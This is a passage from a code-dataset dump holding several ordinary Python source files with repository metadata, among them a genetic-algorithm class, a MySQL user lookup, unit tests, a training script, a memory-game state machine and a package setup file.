    encoded = encoder.fit_transform(np.array(residues).reshape(-1, 1))
    pd.DataFrame(encoded).to_csv(base_dir / "evoEF2.csv", header=None, index=None)
| 0 | 0 | 0 |
dd53ed3751b7fee2e266a9089ec0745853587c76 | 618 | py | Python | delivery/algorithm/genetic/chromosome.py | luist18/feup-iart-proj1 | eebd88bbd55ff96b9c6fbab3863663ca47472de4 | [
"MIT"
] | 1 | 2021-03-11T16:38:42.000Z | 2021-03-11T16:38:42.000Z | delivery/algorithm/genetic/chromosome.py | luist18/feup-iart-proj1 | eebd88bbd55ff96b9c6fbab3863663ca47472de4 | [
"MIT"
] | null | null | null | delivery/algorithm/genetic/chromosome.py | luist18/feup-iart-proj1 | eebd88bbd55ff96b9c6fbab3863663ca47472de4 | [
"MIT"
] | null | null | null | """Holds the chromosome class and helper functions.
Classes:
Chromosome
Functions:
valid_append(List[Path], Path)
valid_insert(List[Path], Path)
"""
class Chromosome:
    """A candidate solution paired with its evaluation.

    Bundles the list of paths that make up a solution together with the
    fitness score assigned to it.
    """

    def __init__(self, solution, fitness):
        """Creates a chromosome from a solution and its score.

        Args:
            solution (List[Path]): The list of paths/steps of a solution
            fitness (integer): The fitness/evaluation of the solution
        """
        self.fitness = fitness
        self.solution = solution
| 20.6 | 72 | 0.627832 | """Holds the chromosome class and helper functions.
Classes:
Chromosome
Functions:
valid_append(List[Path], Path)
valid_insert(List[Path], Path)
"""
class Chromosome:
    """A candidate solution paired with its evaluation.

    Bundles the list of paths that make up a solution together with the
    fitness score assigned to it.
    """

    def __init__(self, solution, fitness):
        """Creates a chromosome from a solution and its score.

        Args:
            solution (List[Path]): The list of paths/steps of a solution
            fitness (integer): The fitness/evaluation of the solution
        """
        self.fitness = fitness
        self.solution = solution
| 0 | 0 | 0 |
6b110a59836850ca22799ff0f109f1da327710b0 | 635 | py | Python | DataBase/UserDao.py | y894577/FocusDiscrimination | b8c44cce0a0a61e5c86bcdbace970e5b7813c2a7 | [
"Apache-2.0"
] | 3 | 2020-03-26T01:41:27.000Z | 2021-04-29T06:53:29.000Z | DataBase/UserDao.py | y894577/FocusDiscrimination | b8c44cce0a0a61e5c86bcdbace970e5b7813c2a7 | [
"Apache-2.0"
] | 1 | 2020-09-28T01:35:19.000Z | 2020-10-14T12:56:21.000Z | DataBase/UserDao.py | y894577/FocusDiscrimination | b8c44cce0a0a61e5c86bcdbace970e5b7813c2a7 | [
"Apache-2.0"
] | null | null | null | import pymysql.cursors
connection = pymysql.connect(host='localhost', port=3306, user='root', passwd='root', db='python_user',
charset='utf8mb4', cursorclass=pymysql.cursors.DictCursor)
| 27.608696 | 103 | 0.601575 | import pymysql.cursors
connection = pymysql.connect(host='localhost', port=3306, user='root', passwd='root', db='python_user',
charset='utf8mb4', cursorclass=pymysql.cursors.DictCursor)
def selectUser(userID, userPsw):
    """Fetch user rows matching the given ID and password.

    Uses a parameterized query: the original concatenated raw input into
    the SQL string, which was both an SQL-injection hole and broken for
    string-typed columns (values were unquoted).

    :param userID: user identifier to look up
    :param userPsw: password to match
    :return: list of matching row dicts, or None on error
    """
    try:
        cursor = connection.cursor()
        # %s placeholders let the driver quote/escape values safely.
        sql = "select * from user where ID = %s and password = %s"
        cursor.execute(sql, (userID, userPsw))
        result = cursor.fetchall()
        return result
    except Exception:
        print("error")
        return None
    finally:
        # NOTE(review): closing the shared module-level connection makes any
        # subsequent call fail; kept here to preserve the original contract,
        # but consider a per-call connection instead.
        connection.close()
def insertUser():
    # TODO: not implemented - placeholder for inserting a new user record.
    pass
150416b7298b0612d68334fd47515170e3caebcb | 1,808 | py | Python | tests/util/test_parseVocabularySources.py | unt-libraries/codalib | d3f2cdf3cc8e9aae14cfab00d1a6de760cc1220b | [
"BSD-3-Clause"
] | null | null | null | tests/util/test_parseVocabularySources.py | unt-libraries/codalib | d3f2cdf3cc8e9aae14cfab00d1a6de760cc1220b | [
"BSD-3-Clause"
] | 31 | 2015-06-15T22:50:50.000Z | 2021-09-30T14:14:51.000Z | tests/util/test_parseVocabularySources.py | unt-libraries/codalib | d3f2cdf3cc8e9aae14cfab00d1a6de760cc1220b | [
"BSD-3-Clause"
] | null | null | null | import json
from unittest.mock import mock_open, patch
import pytest
from codalib import util
def test_return_value():
    """
    Test that parseVocabularySources returns a list of the correct length
    where all elements are tuples.
    """
    terms = [
        {'name': 'foo', 'label': 'Foo'},
        {'name': 'bar', 'label': 'Bar'},
        {'name': 'baz', 'label': 'Baz'},
        {'name': 'qux', 'label': 'Qux'}
    ]
    mocked = mock_open(read_data=json.dumps({'terms': terms}))
    with patch('codalib.util.open', mocked):
        choices = util.parseVocabularySources('/foo/bar')
    assert len(choices) == 4
    # Every element of the returned list must be a tuple.
    assert all(type(choice) is tuple for choice in choices)
def test_return_value_elements():
    """
    Verify that the returned list elements contain the name and the label.
    """
    payload = json.dumps({'terms': [{'name': 'foo', 'label': 'Foo'}]})
    mocked = mock_open(read_data=payload)
    with patch('codalib.util.open', mocked):
        choices = util.parseVocabularySources('/foo/bar')
    assert choices.pop() == ('foo', 'Foo')
@pytest.mark.xfail
def test_empty_file_does_not_raise_exception():
    """
    Verify that an exception will not be raised if the file is empty.
    """
    with patch('codalib.util.open', mock_open()):
        util.parseVocabularySources('/foo/bar')
@pytest.mark.xfail
def test_empty_json_does_not_raise_exception():
    """
    Verify that an exception will not be raised if the file has a json
    object, but the object is empty.
    """
    with patch('codalib.util.open', mock_open(read_data=json.dumps({}))):
        util.parseVocabularySources('/foo/bar')
| 26.588235 | 74 | 0.61615 | import json
from unittest.mock import mock_open, patch
import pytest
from codalib import util
def test_return_value():
    """
    Test that parseVocabularySources returns a list of the correct length
    where all elements are tuples.
    """
    terms = [
        {'name': 'foo', 'label': 'Foo'},
        {'name': 'bar', 'label': 'Bar'},
        {'name': 'baz', 'label': 'Baz'},
        {'name': 'qux', 'label': 'Qux'}
    ]
    mocked = mock_open(read_data=json.dumps({'terms': terms}))
    with patch('codalib.util.open', mocked):
        choices = util.parseVocabularySources('/foo/bar')
    assert len(choices) == 4
    # Every element of the returned list must be a tuple.
    assert all(type(choice) is tuple for choice in choices)
def test_return_value_elements():
    """
    Verify that the returned list elements contain the name and the label.
    """
    payload = json.dumps({'terms': [{'name': 'foo', 'label': 'Foo'}]})
    mocked = mock_open(read_data=payload)
    with patch('codalib.util.open', mocked):
        choices = util.parseVocabularySources('/foo/bar')
    assert choices.pop() == ('foo', 'Foo')
@pytest.mark.xfail
def test_empty_file_does_not_raise_exception():
    """
    Verify that an exception will not be raised if the file is empty.
    """
    with patch('codalib.util.open', mock_open()):
        util.parseVocabularySources('/foo/bar')
@pytest.mark.xfail
def test_empty_json_does_not_raise_exception():
    """
    Verify that an exception will not be raised if the file has a json
    object, but the object is empty.
    """
    with patch('codalib.util.open', mock_open(read_data=json.dumps({}))):
        util.parseVocabularySources('/foo/bar')
| 0 | 0 | 0 |
69f110c398b313bd1108ae0bd5a94bc20d36ae19 | 1,735 | py | Python | WindNinja_learning/prm_windninja.py | louisletoumelin/wind_downscaling_cnn | 9d08711620db1ee1f472847f0e822c5f4eb1d300 | [
"W3C"
] | null | null | null | WindNinja_learning/prm_windninja.py | louisletoumelin/wind_downscaling_cnn | 9d08711620db1ee1f472847f0e822c5f4eb1d300 | [
"W3C"
] | 12 | 2021-11-30T16:56:05.000Z | 2021-12-13T16:26:31.000Z | WindNinja_learning/prm_windninja.py | louisletoumelin/wind_downscaling_cnn | 9d08711620db1ee1f472847f0e822c5f4eb1d300 | [
"W3C"
] | null | null | null | from utils_prm import select_cfg_file
| 34.019608 | 185 | 0.673775 | from utils_prm import select_cfg_file
def create_prm():
    """Build the parameter dictionary (prm) that drives the WindNinja runs."""
    prm = {}

    prm["stations"] = ["Col du Lac Blanc"]

    # Simulation window start: 4 August 2017, 06h
    prm["hour_begin"] = 6
    prm["day_begin"] = 4
    prm["month_begin"] = 8
    prm["year_begin"] = 2017

    # Simulation window end: 5 August 2017, 01h
    prm["hour_end"] = 1
    prm["day_end"] = 5
    prm["month_end"] = 8
    prm["year_end"] = 2017

    prm["begin"] = "{0}-{1}-{2}".format(prm["year_begin"], prm["month_begin"], prm["day_begin"])
    prm["end"] = "{0}-{1}-{2}".format(prm["year_end"], prm["month_end"], prm["day_end"])

    # Parent directory
    prm["working_directory"] = "C:/Users/louis/git/wind_downscaling_CNN/"

    # Data
    prm["data_path"] = prm["working_directory"] + "Data/1_Raw/"

    # Topography
    prm["topo_path"] = prm["data_path"] + "MNT/Copernicus/COP30_L93_cropped.tif"
    prm["windninja_topo"] = 'C:/Users/louis/git/wind_downscaling_CNN/Data/2_Pre_processed/WindNinja/'

    # WindNinja
    prm["output_path"] = 'C:/Users/louis/git/wind_downscaling_CNN/Data/2_Pre_processed/WindNinja/'
    prm["path_to_WindNinja"] = "C:/WindNinja/WindNinja-3.7.2/bin/"
    prm["solver"] = "momentum"  # "momentum" or "mass"

    # Observations
    prm["BDclim_stations_path"] = prm["working_directory"] + "Data/2_Pre_processed/WindNinja/" + "stations_with_nearest_neighbors.csv"

    # AROME
    prm["nwp_name"] = "AROME"
    prm["AROME_files"] = [prm["data_path"] + "AROME/FORCING_alp_2017080106_2018080106_32bits.nc",
                          prm["data_path"] + "AROME/FORCING_alp_2018080106_2019060106_32bits.nc"]
    prm["AROME_files_temperature"] = [prm["data_path"] + "AROME/T2m_FORCING_alp_2017080106_2018080106_32bits.nc",
                                      prm["data_path"] + "AROME/T2m_FORCING_alp_2018080106_2019060106_32bits.nc"]

    prm = select_cfg_file(prm)

    return prm
| 1,673 | 0 | 23 |
c1c7b761d689247bf00866e84dba25fa6023c21a | 531 | py | Python | codes_/0572_Subtree_of_Another_Tree.py | SaitoTsutomu/leetcode | 4656d66ab721a5c7bc59890db9a2331c6823b2bf | [
"MIT"
] | null | null | null | codes_/0572_Subtree_of_Another_Tree.py | SaitoTsutomu/leetcode | 4656d66ab721a5c7bc59890db9a2331c6823b2bf | [
"MIT"
] | null | null | null | codes_/0572_Subtree_of_Another_Tree.py | SaitoTsutomu/leetcode | 4656d66ab721a5c7bc59890db9a2331c6823b2bf | [
"MIT"
] | null | null | null | # %% [572. *Subtree of Another Tree](https://leetcode.com/problems/subtree-of-another-tree/)
# 問題:tがsの部分木かどうかを返す
# 解法:再帰を用いる
| 37.928571 | 92 | 0.600753 | # %% [572. *Subtree of Another Tree](https://leetcode.com/problems/subtree-of-another-tree/)
# 問題:tがsの部分木かどうかを返す
# 解法:再帰を用いる
class Solution:
    """LeetCode 572: decide whether one binary tree is a subtree of another."""

    def isSubtree(self, s: TreeNode, t: TreeNode, just=False) -> bool:
        """Return True when `t` occurs as a subtree of `s`.

        `just=True` restricts the check to an exact match rooted at `s`;
        it is used internally for the node-by-node comparison.
        """
        # Both trees exhausted -> match; exactly one exhausted -> mismatch.
        if not s or not t:
            return not s and not t
        # Unless anchored at `s`, first try rooting the match further down.
        if not just:
            if self.isSubtree(s.left, t) or self.isSubtree(s.right, t):
                return True
        # Exact comparison: roots must agree, then both child pairs must match.
        if s.val != t.val:
            return False
        return self.isSubtree(s.left, t.left, True) and self.isSubtree(
            s.right, t.right, True
        )
| 364 | -6 | 48 |
4d392595fef585885f6c94d9636ef74c305befe4 | 2,246 | py | Python | software/python/potentiostat/setup.py | selvanair/potentiometer | 6a2bb8433e877ef663973ea9fe1e3798029e840a | [
"CC-BY-4.0",
"MIT"
] | null | null | null | software/python/potentiostat/setup.py | selvanair/potentiometer | 6a2bb8433e877ef663973ea9fe1e3798029e840a | [
"CC-BY-4.0",
"MIT"
] | 2 | 2020-07-19T19:41:50.000Z | 2021-05-11T05:51:50.000Z | software/python/potentiostat/setup.py | selvanair/potentiometer | 6a2bb8433e877ef663973ea9fe1e3798029e840a | [
"CC-BY-4.0",
"MIT"
] | null | null | null | """
iorodeo-potentiostat
---------------------
Python interface to IO Rodeo's Potentiostat Shield for the teensy 3.2 development
board.
Example
--------
.. code:: python
from potentiostat import Potentiostat
dev = Potentiostat('/dev/ttyACM0')
dev.set_curr_range('100uA')
dev.set_sample_period(10)
name = 'cyclic'
param = {
'quietValue' : 0.0,
'quietTime' : 1000,
'amplitude' : 2.0,
'offset' : 0.0,
'period' : 1000,
'numCycles' : 5,
'shift' : 0.0,
}
dev.set_param(name,param)
t,volt,curr = dev.run_test(name,display='pbar')
Install
--------
.. code:: bash
$ pip install iorodeo-potentiostat
Links
-----
* Documentation http://stuff.iorodeo.com/docs/potentiostat
* Download https://bitbucket.org/iorodeo/potentiostat
"""
from setuptools import setup, find_packages
from os import path
# Absolute directory containing this setup.py (conventional helper variable).
here = path.abspath(path.dirname(__file__))
# Distribution metadata; long_description reuses this module's docstring.
setup(
    name='iorodeo-potentiostat',
    version='0.0.3',
    description='Serial interface to IO Rodeo Potentiostat',
    long_description=__doc__,
    url='https://bitbucket.org/iorodeo/potentiostat',
    author='Will Dickson',
    author_email='will@iorodeo.com',
    license='MIT',
    classifiers=[
        'Development Status :: 3 - Alpha',
        'Intended Audience :: Developers',
        'Intended Audience :: Science/Research',
        'Topic :: Scientific/Engineering :: Chemistry',
        'Topic :: Software Development :: Libraries',
        'Topic :: Software Development :: Libraries :: Python Modules',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Operating System :: POSIX',
        'Operating System :: Microsoft :: Windows',
        'Operating System :: MacOS :: MacOS X',
    ],
    keywords='Serial interface for IO Rodeo Potentiostat',
    # examples/docs/tests are shipped in the repo but not installed
    packages=find_packages(exclude=['docs', 'tests', 'examples']),
    install_requires=['pyserial','progressbar33'],
)
| 25.816092 | 82 | 0.60285 | """
iorodeo-potentiostat
---------------------
Python interface to IO Rodeo's Potentiostat Shield for the teensy 3.2 development
board.
Example
--------
.. code:: python
from potentiostat import Potentiostat
dev = Potentiostat('/dev/ttyACM0')
dev.set_curr_range('100uA')
dev.set_sample_period(10)
name = 'cyclic'
param = {
'quietValue' : 0.0,
'quietTime' : 1000,
'amplitude' : 2.0,
'offset' : 0.0,
'period' : 1000,
'numCycles' : 5,
'shift' : 0.0,
}
dev.set_param(name,param)
t,volt,curr = dev.run_test(name,display='pbar')
Install
--------
.. code:: bash
$ pip install iorodeo-potentiostat
Links
-----
* Documentation http://stuff.iorodeo.com/docs/potentiostat
* Download https://bitbucket.org/iorodeo/potentiostat
"""
from setuptools import setup, find_packages
from os import path
here = path.abspath(path.dirname(__file__))
setup(
name='iorodeo-potentiostat',
version='0.0.3',
description='Serial interface to IO Rodeo Potentiostat',
long_description=__doc__,
url='https://bitbucket.org/iorodeo/potentiostat',
author='Will Dickson',
author_email='will@iorodeo.com',
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering :: Chemistry',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Operating System :: POSIX',
'Operating System :: Microsoft :: Windows',
'Operating System :: MacOS :: MacOS X',
],
keywords='Serial interface for IO Rodeo Potentiostat',
packages=find_packages(exclude=['docs', 'tests', 'examples']),
install_requires=['pyserial','progressbar33'],
)
| 0 | 0 | 0 |
4b03ffd7aac5cf914459cbc12cde134a95a34337 | 5,402 | py | Python | src/memory_logic.py | m-toman/AudioGames | cb1802882bd74cc1510e809b6881e7bc563ae5d6 | [
"MIT"
] | 2 | 2015-11-18T08:31:30.000Z | 2015-11-18T09:16:41.000Z | src/memory_logic.py | m-toman/AudioGames | cb1802882bd74cc1510e809b6881e7bc563ae5d6 | [
"MIT"
] | null | null | null | src/memory_logic.py | m-toman/AudioGames | cb1802882bd74cc1510e809b6881e7bc563ae5d6 | [
"MIT"
] | 1 | 2019-11-21T03:07:39.000Z | 2019-11-21T03:07:39.000Z | #!/usr/bin/env python
# FTW Telecommunications Research Center Vienna (www.ftw.at)
# Dietmar Schabus (schabus@ftw.at)
# July 2014
# library imports
import datetime
import random
# imports from this project
import memory_config
import liblog
# ==============================================================================
# memory_logic.Logic
# ==============================================================================
| 39.144928 | 152 | 0.495742 | #!/usr/bin/env python
# FTW Telecommunications Research Center Vienna (www.ftw.at)
# Dietmar Schabus (schabus@ftw.at)
# July 2014
# library imports
import datetime
import random
# imports from this project
import memory_config
import liblog
def enum(*sequential, **named):
    """Build a lightweight enum-like class.

    Positional names are numbered 0, 1, 2, ... in declaration order;
    keyword arguments map names to explicit values.
    """
    members = {name: index for index, name in enumerate(sequential)}
    members.update(named)
    return type('Enum', (), members)
# ==============================================================================
# memory_logic.Logic
# ==============================================================================
class GameLogic(object):
    """State machine of an audio memory (pairs) game.

    The caller feeds events into handle_event() and receives the name of
    the next game phase ('select1', 'select2', 'wrongfield', 'finished')
    or None when no phase change is needed.
    NOTE: Python 2 code (print statement, integer division in Board).
    """
    class Board(object):
        """Flat list of fields holding pair ids; 0 means solved/empty."""
        def __init__(self, size):
            # size: total number of fields; size/2 pairs are placed.
            self.size = size
            self.fields = [0] * size
            self.init_fields()
        def init_fields(self):
            # loop size / 2 memory objects and choose 2 fields for each
            # (every object id is written into two randomly chosen free fields)
            for memoryobject in range( 1, self.size / 2 + 1):
                idx = random.choice( [ ele for ele in range(len(self.fields)) if self.fields[ele] == 0 ] )
                self.fields[idx] = memoryobject
                idx = random.choice( [ ele for ele in range(len(self.fields)) if self.fields[ele] == 0 ] )
                self.fields[idx] = memoryobject
            print self.fields
    def __init__(self, sizename):
        """Set up the logic for the board size named in memory_config.size."""
        # names of the memory objects; presumably filled in by the caller
        # before handle_event() logs them -- TODO confirm
        self.things = None
        self.States = enum( 'SELECT_1', 'SELECT_2', 'FINISH' )
        self.current_state = None
        self.current_thing = None
        self.size = memory_config.size[sizename]
        # when the game logic changes this to True, the game should terminate
        self.terminate = False
        # create the board
        self.board = self.Board( self.size )
    def handle_event(self, eventstring):
        """Advance the state machine by one event; return next phase name or None."""
        if eventstring == '':
            return None
        #print 'eventstring: {}'.format(eventstring)
        if eventstring == 'terminate':
            self.terminate = True
            return None
        if eventstring == 'hardterminate':
            self.terminate = True
            return None
        # get started
        if eventstring == 'begin':
            self.current_state = self.States.SELECT_1
            self.field1 = None
            self.field2 = None
            self.current_thing = None
            self.last_correct = None
            self.starttime = datetime.datetime.now()
            self.numsteps = 0
            return 'select1'
        # user selected a field
        if eventstring.startswith( "field_" ):
            fieldsel = int(eventstring[6:])
            # reject already-solved fields (== 0) and re-selecting field1
            if self.board.fields[fieldsel] < 1 or fieldsel == self.field1:
                liblog.log('user selected field {} which is already finished.'.format(fieldsel))
                return 'wrongfield'
            # user selected the first field
            if self.current_state == self.States.SELECT_1:
                liblog.log('user selected field1: {} ({}).'.format(fieldsel, self.things[self.board.fields[ fieldsel ]-1]))
                self.field1 = fieldsel
                self.current_thing = self.board.fields[fieldsel]
                self.current_state = self.States.SELECT_2
                return 'select2'
            # user selected the second field
            if self.current_state == self.States.SELECT_2:
                liblog.log('user selected field2: {} ({}).'.format(fieldsel, self.things[self.board.fields[ fieldsel ]-1]))
                self.field2 = fieldsel
                self.current_thing = self.board.fields[fieldsel]
                self.numsteps += 1
                # see if fields match
                if self.board.fields[ self.field1 ] == self.board.fields[ self.field2 ]:
                    liblog.log('user was correct with field1: {} ({}) and field2: {} ({}).'.format(
                        self.field1, self.things[self.board.fields[ self.field1 ]-1], self.field2, self.things[self.board.fields[ self.field2 ]-1]))
                    # mark the pair as solved
                    self.board.fields[ self.field1 ] = self.board.fields[ self.field2 ] = 0
                    self.last_correct = True
                    # all pairs solved -> game over
                    if sum(self.board.fields) == 0:
                        elapsedtime = datetime.datetime.now() - self.starttime
                        liblog.log('goal reached after {} steps and {} seconds'.format(
                            self.numsteps, elapsedtime.total_seconds()))
                        self.current_state = self.States.FINISH
                        return 'finished'
                else:
                    liblog.log('user was wrong with field1: {} ({}) and field2: {} ({}).'.format(
                        self.field1, self.things[self.board.fields[ self.field1 ]-1], self.field2, self.things[self.board.fields[ self.field2 ]-1]))
                    self.last_correct = False
                # either way: clear the selection and ask for a new first field
                self.field1 = None
                self.field2 = None
                self.current_state = self.States.SELECT_1
                return 'select1'
        return None
| 4,703 | 210 | 45 |
c434b8b863f15707893deeb7b78b671225d534ce | 5,584 | py | Python | src/train.py | StarGazer1995/FCN-CD-PyTorch | 17f33470000a9bab6c5ea98bd3eba38f87868b2f | [
"BSD-2-Clause"
] | null | null | null | src/train.py | StarGazer1995/FCN-CD-PyTorch | 17f33470000a9bab6c5ea98bd3eba38f87868b2f | [
"BSD-2-Clause"
] | null | null | null | src/train.py | StarGazer1995/FCN-CD-PyTorch | 17f33470000a9bab6c5ea98bd3eba38f87868b2f | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python3
import argparse
import os
import shutil
import random
import ast
from os.path import basename, exists, splitext
import torch
import torch.backends.cudnn as cudnn
import numpy as np
import yaml
from core.trainers import CDTrainer
from utils.misc import OutPathGetter, Logger, register
if __name__ == '__main__':
main() | 35.341772 | 96 | 0.657772 | #!/usr/bin/env python3
import argparse
import os
import shutil
import random
import ast
from os.path import basename, exists, splitext
import torch
import torch.backends.cudnn as cudnn
import numpy as np
import yaml
from core.trainers import CDTrainer
from utils.misc import OutPathGetter, Logger, register
def read_config(config_path):
    """Read a YAML experiment config file.

    Returns the parsed mapping, or an empty dict when the file is empty.
    """
    with open(config_path, 'r') as fp:
        parsed = yaml.load(fp.read(), Loader=yaml.FullLoader)
    return parsed if parsed else {}
def parse_config(cfg_name, cfg):
    """Derive default 'tag' and 'suffix' entries from a config file name.

    A name shaped like ``config_<tag>_<suffix parts...>.yaml`` contributes
    a default tag (second underscore token) and suffix (remaining tokens
    re-joined with underscores).  Existing keys in *cfg* win; *cfg* is
    returned for convenience.
    """
    tokens = splitext(cfg_name)[0].split('_')
    if len(tokens) > 1:
        cfg.setdefault('tag', tokens[1])
        cfg.setdefault('suffix', '_'.join(tokens[2:]))
    return cfg
def parse_args():
    """Parse command-line (and optional YAML config) settings.

    When --exp-config names an existing file, its values are installed as
    new argparse defaults and the command line is parsed a second time, so
    explicitly given command-line options still take precedence.
    """
    # Training settings
    parser = argparse.ArgumentParser()
    parser.add_argument('cmd', choices=['train', 'val'])
    # Data
    # Common
    group_data = parser.add_argument_group('data')
    group_data.add_argument('-d', '--dataset', type=str, default='OSCD')
    group_data.add_argument('-p', '--crop-size', type=int, default=256, metavar='P',
                            help='patch size (default: %(default)s)')
    group_data.add_argument('--num-workers', type=int, default=8)
    group_data.add_argument('--repeats', type=int, default=100)
    # Optimizer
    group_optim = parser.add_argument_group('optimizer')
    group_optim.add_argument('--optimizer', type=str, default='Adam')
    group_optim.add_argument('--lr', type=float, default=1e-4, metavar='LR',
                             help='learning rate (default: %(default)s)')
    group_optim.add_argument('--lr-mode', type=str, default='const')
    group_optim.add_argument('--weight-decay', default=1e-4, type=float,
                             metavar='W', help='weight decay (default: %(default)s)')
    group_optim.add_argument('--step', type=int, default=200)
    # Training related
    group_train = parser.add_argument_group('training related')
    group_train.add_argument('--batch-size', type=int, default=8, metavar='B',
                             help='input batch size for training (default: %(default)s)')
    group_train.add_argument('--num-epochs', type=int, default=1000, metavar='NE',
                             help='number of epochs to train (default: %(default)s)')
    group_train.add_argument('--load-optim', action='store_true')
    group_train.add_argument('--resume', default='', type=str, metavar='PATH',
                             help='path to latest checkpoint')
    group_train.add_argument('--anew', action='store_true',
                             help='clear history and start from epoch 0 with the checkpoint loaded')
    group_train.add_argument('--trace-freq', type=int, default=50)
    group_train.add_argument('--device', type=str, default='cpu')
    group_train.add_argument('--metrics', type=str, default='F1Score+Accuracy+Recall+Precision')
    # Experiment
    group_exp = parser.add_argument_group('experiment related')
    group_exp.add_argument('--exp-dir', default='../exp/')
    group_exp.add_argument('-o', '--out-dir', default='')
    group_exp.add_argument('--tag', type=str, default='')
    group_exp.add_argument('--suffix', type=str, default='')
    group_exp.add_argument('--exp-config', type=str, default='')
    group_exp.add_argument('--save-on', action='store_true')
    group_exp.add_argument('--log-off', action='store_true')
    group_exp.add_argument('--suffix-off', action='store_true')
    # Criterion
    group_critn = parser.add_argument_group('criterion related')
    group_critn.add_argument('--criterion', type=str, default='NLL')
    group_critn.add_argument('--weights', type=str, default=(1.0, 1.0))
    # Model
    group_model = parser.add_argument_group('model')
    group_model.add_argument('--model', type=str, default='siamunet_conc')
    group_model.add_argument('--num-feats-in', type=int, default=13)
    args = parser.parse_args()
    if exists(args.exp_config):
        cfg = read_config(args.exp_config)
        cfg = parse_config(basename(args.exp_config), cfg)
        # Settings from cfg file overwrite those in args
        # Note that the non-default values will not be affected
        parser.set_defaults(**cfg) # Reset part of the default values
        args = parser.parse_args() # Parse again
    # Handle args.weights
    # (it may arrive as a string such as "(1.0, 1.0)" from the CLI or config file)
    if isinstance(args.weights, str):
        args.weights = ast.literal_eval(args.weights)
    args.weights = tuple(args.weights)
    return args
def set_gpc_and_logger(args):
    """Instantiate the output-path getter and logger and register them globally.

    Returns the (gpc, logger) pair after publishing both via register().
    """
    out_root = os.path.join(args.exp_dir, args.tag)
    gpc = OutPathGetter(root=out_root, suffix=args.suffix)
    # An empty log_dir disables file logging.
    if args.log_off:
        log_dir = ''
    else:
        log_dir = gpc.get_dir('log')
    logger = Logger(scrn=True, log_dir=log_dir, phase=args.cmd)
    register('GPC', gpc)
    register('LOGGER', logger)
    return gpc, logger
def main():
    """Entry point: parse settings, fix random seeds and run the trainer."""
    args = parse_args()
    gpc, logger = set_gpc_and_logger(args)
    if args.exp_config:
        # Make a copy of the config file
        cfg_path = gpc.get_path('root', basename(args.exp_config), suffix=False)
        shutil.copy(args.exp_config, cfg_path)
    # Set random seed
    # (python/numpy/torch seeded and cuDNN forced deterministic for reproducibility)
    RNG_SEED = 1
    random.seed(RNG_SEED)
    np.random.seed(RNG_SEED)
    torch.manual_seed(RNG_SEED)
    cudnn.deterministic = True
    cudnn.benchmark = False
    try:
        trainer = CDTrainer(args.model, args.dataset, args.optimizer, args)
        trainer.run()
    except BaseException as e:
        import traceback
        # Catch ALL kinds of exceptions
        # so that the full traceback is logged before the process exits
        logger.fatal(traceback.format_exc())
        exit(1)
if __name__ == '__main__':
main() | 5,113 | 0 | 115 |
352bffccb5db695de7720978c4141cbd2aadc397 | 1,464 | py | Python | tungsten_tempest_plugin/services/contrail/json/base.py | Vegasq/tungsten-tempest | 624584cd1a2298b92a44223de1ca7ae23c6f3476 | [
"Apache-2.0"
] | 1 | 2019-04-29T09:00:16.000Z | 2019-04-29T09:00:16.000Z | tungsten_tempest_plugin/services/contrail/json/base.py | Vegasq/tungsten-tempest | 624584cd1a2298b92a44223de1ca7ae23c6f3476 | [
"Apache-2.0"
] | 11 | 2018-12-04T14:20:27.000Z | 2019-05-30T14:37:13.000Z | tungsten_tempest_plugin/services/contrail/json/base.py | Vegasq/tungsten-tempest | 624584cd1a2298b92a44223de1ca7ae23c6f3476 | [
"Apache-2.0"
] | 9 | 2018-07-26T18:20:45.000Z | 2020-03-27T17:40:56.000Z | # Copyright 2016 AT&T Corp
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Base service class for all service classes
"""
from oslo_log import log as logging
from tempest.lib.common import rest_client
LOG = logging.getLogger(__name__)
class BaseContrailClient(rest_client.RestClient):
"""Base Tempest REST client for Designate API"""
class ResponseBody(dict):
"""Class that wraps an http response and dict body into a single value.
Callers that receive this object will normally use it as a dict but
can extract the response if needed.
"""
| 31.826087 | 78 | 0.704918 | # Copyright 2016 AT&T Corp
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Base service class for all service classes
"""
from oslo_log import log as logging
from tempest.lib.common import rest_client
LOG = logging.getLogger(__name__)
class BaseContrailClient(rest_client.RestClient):
    """Base Tempest REST client for Designate API"""

    class ResponseBody(dict):
        """Class that wraps an http response and dict body into a single value.

        Callers that receive this object will normally use it as a dict but
        can extract the response if needed.
        """

        def __init__(self, response, body=None, **kwargs):
            # BUGFIX: the nested class must be referenced through the outer
            # class -- a bare ``super(ResponseBody, self)`` raises NameError
            # at call time because a nested class name is not visible from
            # inside its own methods.
            super(BaseContrailClient.ResponseBody, self).__init__(**kwargs)
            body_data = body or {}
            self.update(body_data)
            # keep the raw http response accessible alongside the dict body
            self.response = response

        def __str__(self):
            # same nested-class super() fix as in __init__
            body = super(BaseContrailClient.ResponseBody, self).__str__()
            return "response: %s\nBody: %s" % (self.response, body)
| 289 | 0 | 54 |
8f7bd584acc1126e963ba497f2eade43c2467a35 | 9,519 | py | Python | sources/elasticsearch/logs2dataflow.py | macbre/database-flow-graph | 74ceeff51083c3f9d8bd00bdbf56615708942e42 | [
"MIT"
